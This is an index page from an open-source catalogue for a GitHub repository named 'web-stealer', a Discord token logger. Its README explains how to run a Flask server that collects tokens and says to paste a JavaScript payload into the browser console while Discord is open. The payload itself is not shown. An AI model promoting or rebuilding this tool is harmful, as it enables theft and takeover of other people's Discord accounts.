Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/baum1810/web-stealer
javascript discord token logger (web)
https://github.com/baum1810/web-stealer
baum1810 flask grabber js python token token-graber web-grabber web-grabbing
Last synced: 29 days ago
JSON representation
javascript discord token logger (web)
- Host: GitHub
- URL: https://github.com/baum1810/web-stealer
- Owner: baum1810
- Created: 2024-09-11T19:44:51.000Z (2 months ago)
- Default Branch: main
- Last Pushed: 2024-09-27T20:56:14.000Z (about 2 months ago)
- Last Synced: 2024-10-01T10:22:48.762Z (about 1 month ago)
- Topics: baum1810, flask, grabber, js, python, token, token-graber, web-grabber, web-grabbing
- Language: Python
- Homepage:
- Size: 8.79 KB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Web-Stealer Setup Guide
## Platforms
This tool is compatible with Windows, macOS, Linux, and any other operating systems that support Python and Flask.
## Setup Instructions
1. **Clone the Repository**:
```
git clone https://github.com/osintcats/web-stealer.git
```2. **Navigate to the Project Directory**:
```
cd web-stealer
```3. **Install Required Python Packages**:
Ensure you have Python and pip installed. Create a `requirements.txt` file with the required dependencies and install them:
```
pip install -r requirements.txt
```4. **Run the Flask Application**:
```
python api.py
```## Payload JavaScript Snippet
To send the token to your server, use the following JavaScript snippet. Replace `'PASTE_URL_HERE'` with the URL of your Flask application. Copy the generated payload and paste it into the browser console while Discord is open. The token will be sent to your server.
## Credz
fixes by [baum1810](https://github.com/baum1810)# Disclaimer
This program is intended solely for educational purposes to highlight potential security vulnerabilities. Do not use this program for unauthorized access or token grabbing. The creator assumes no responsibility for any damage or misuse resulting from the use of this software.